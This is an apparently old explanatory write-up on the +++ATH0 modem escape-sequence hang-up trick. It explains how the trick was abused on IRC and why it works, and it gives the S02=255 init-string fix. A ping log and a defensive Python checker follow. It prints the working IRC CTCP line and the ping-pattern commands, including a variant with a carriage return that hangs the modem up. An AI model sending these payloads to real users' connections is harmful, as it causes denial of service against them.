The modem control code for "disconnect" or "hang up". Some modems are foolish enough to interpret this as the software actually telling it to disconnect, and thus sending this string with a dialup modem will often result in you being knocked offline.

The problem was that the easily amused on IRC would abuse this by going into a populated channel that they thought was particularly lame, e.g. #windows, and typing

/ctcp #windows PING +++ATH0

...which would cause about 1/3 of the channel to spontaneously ping out, since IRC clients, on receiving a "PING" command, are supposed to echo back whatever string was sent with it (usually a timestamp).

People eventually got smart about it, and began hacking their modem scripts to ignore +++ATH0, as well as patching or scripting their IRC client to ignore messages containing this string. However, if you still wish to be nasty and denial of service attack someone with this, you need only get a Unix shell on a non-vulnerable connection and do

ping -c 5 -p 2B2B2B41544829 <target IP address>

"2B2B2B41544829" being the hex code for the bytes spelling out +++ATH0. I don't recommend doing this. No, really, I don't. Heheh. Yes, I've had a cable modem since 1997 or so, why do you ask?

This attack works because the PPP driver expects the modem to pass the string "+++" unchanged to the other side, while the modem interprets it as the 'escape string' - a request to exit from data mode and accept a command. Once the modem is in command mode, the string ATH0 instructs it to hang up immediately [1].

With most modern modems, it's easy to protect yourself from such an attack [2]. Almost all modems nowadays are Hayes compatible, and allow the user to remap the escape character using S register number 2. The escape string is always a sequence of three escape characters, but the escape character may be changed from the default of 0x2B ("+") to anything from 0x00 to 0x7F, by setting the S register to the decimal value of the required character. Decimal values of 128-255 disable the escape sequence completely.

Most PPP implementations do not use the escape sequence at all - to hang up the modem they drop the DTR signal, which (depending on the modem) is interpreted as a request to hang up or reset. Therefore, there is no loss of function in disabling the escape sequence on a modem that is used solely to access the internet.

To disable the escape sequence (and therefore protect your modem against this attack), add the string "S02=255" to the end of your modem's init string. If it has no init string set, use the string "ATS02=255".

In Windows NTs, the init string can be set in the device manager properties for the modem, under 'Advanced', 'Extra initialization commands'. In Windows 9xes, the init string can be set in the dial-up-networking properties for each connection, under 'Advanced Connection Settings', 'Extra settings'. Most unixes have a different way of setting the initialization string - have a look in the manual if you can't find it in the PPP configuration program.


1 - The attack, as stated above, does not actually hang up the modem. Modem commands must end in a carriage return character (0x0D). The above attack is arguably worse, as it leaves the modem in a state where attempts to re-dial or reset the modem may not work without human intervention. To ping a modem and hang it up, use "ping -c 5 -p 2B2B2B415448290D <target IP address>".

2 - Actual results of carrying out the ping exploit from a shell account to my (secured) dialup:

lj@warspite.inf.ed.ac.uk$ ping -c 5 -p 2B2B2B41544829 modem-2940.wolf.dialup.pol.co.uk
PATTERN: 0x2b2b2b41544829
PING modem-2940.wolf.dialup.pol.co.uk (81.76.139.124) from 129.215.32.201 : 56(84) bytes of data.
64 bytes from modem-2940.wolf.dialup.pol.co.uk (81.76.139.124): icmp_seq=1 ttl=53 time=165 ms
64 bytes from modem-2940.wolf.dialup.pol.co.uk (81.76.139.124): icmp_seq=2 ttl=53 time=166 ms
64 bytes from modem-2940.wolf.dialup.pol.co.uk (81.76.139.124): icmp_seq=3 ttl=53 time=163 ms
64 bytes from modem-2940.wolf.dialup.pol.co.uk (81.76.139.124): icmp_seq=4 ttl=53 time=167 ms
64 bytes from modem-2940.wolf.dialup.pol.co.uk (81.76.139.124): icmp_seq=5 ttl=53 time=169 ms

--- modem-2940.wolf.dialup.pol.co.uk ping statistics ---
5 packets transmitted, 5 received, 0% loss, time 4040ms
rtt min/avg/max/mdev = 163.473/166.507/169.860/2.068 ms
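
The S register 2 rules and the carriage-return distinction from footnote 1, as an added Python example for checking data that a host would echo back through its modem (not code from the original writeups). The function names, result labels and the sample init string "ATE0V1" are assumptions made for illustration.

```python
import re

DEFAULT_S2 = 0x2B  # "+", the default escape character


def escape_string(s2=DEFAULT_S2):
    """Return the 3-byte escape string for an S2 value, or None if disabled."""
    if not 0 <= s2 <= 255:
        raise ValueError("S2 holds a decimal value from 0 to 255")
    # 0-127 select the escape character; 128-255 switch the escape off.
    return None if s2 >= 128 else bytes([s2]) * 3


def scan(payload, s2=DEFAULT_S2):
    """Classify data that would be echoed back out through the modem.

    not-vulnerable       : escape sequence disabled (S2 is 128-255)
    clean                : no escape string followed by an AT command
    command-unterminated : escape + AT command with no 0x0D (footnote 1:
                           the modem is left sitting in command mode)
    command-terminated   : escape + AT command ending in 0x0D
    """
    esc = escape_string(s2)
    if esc is None:
        return "not-vulnerable"
    m = re.search(re.escape(esc) + rb"AT[^\r]*(\r?)", payload, re.IGNORECASE)
    if m is None:
        return "clean"
    return "command-terminated" if m.group(1) else "command-unterminated"


def harden_init(init=""):
    """Append S02=255 to an init string, or build one if none is set."""
    init = init.strip()
    if not init:
        return "ATS02=255"
    return init if init.upper().endswith("S02=255") else init + "S02=255"


if __name__ == "__main__":
    # Constructed sample payloads, not captured traffic.
    for sample in (b"PING 1042738211", b"PING +++ATH0", b"+++ATH0\r"):
        print(sample, "->", scan(sample), "| with S2=255:", scan(sample, 255))
    print(harden_init("ATE0V1"))  # "ATE0V1" is a constructed init string
```

A client-side filter would drop or rewrite anything that `scan` does not report as clean before echoing it.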
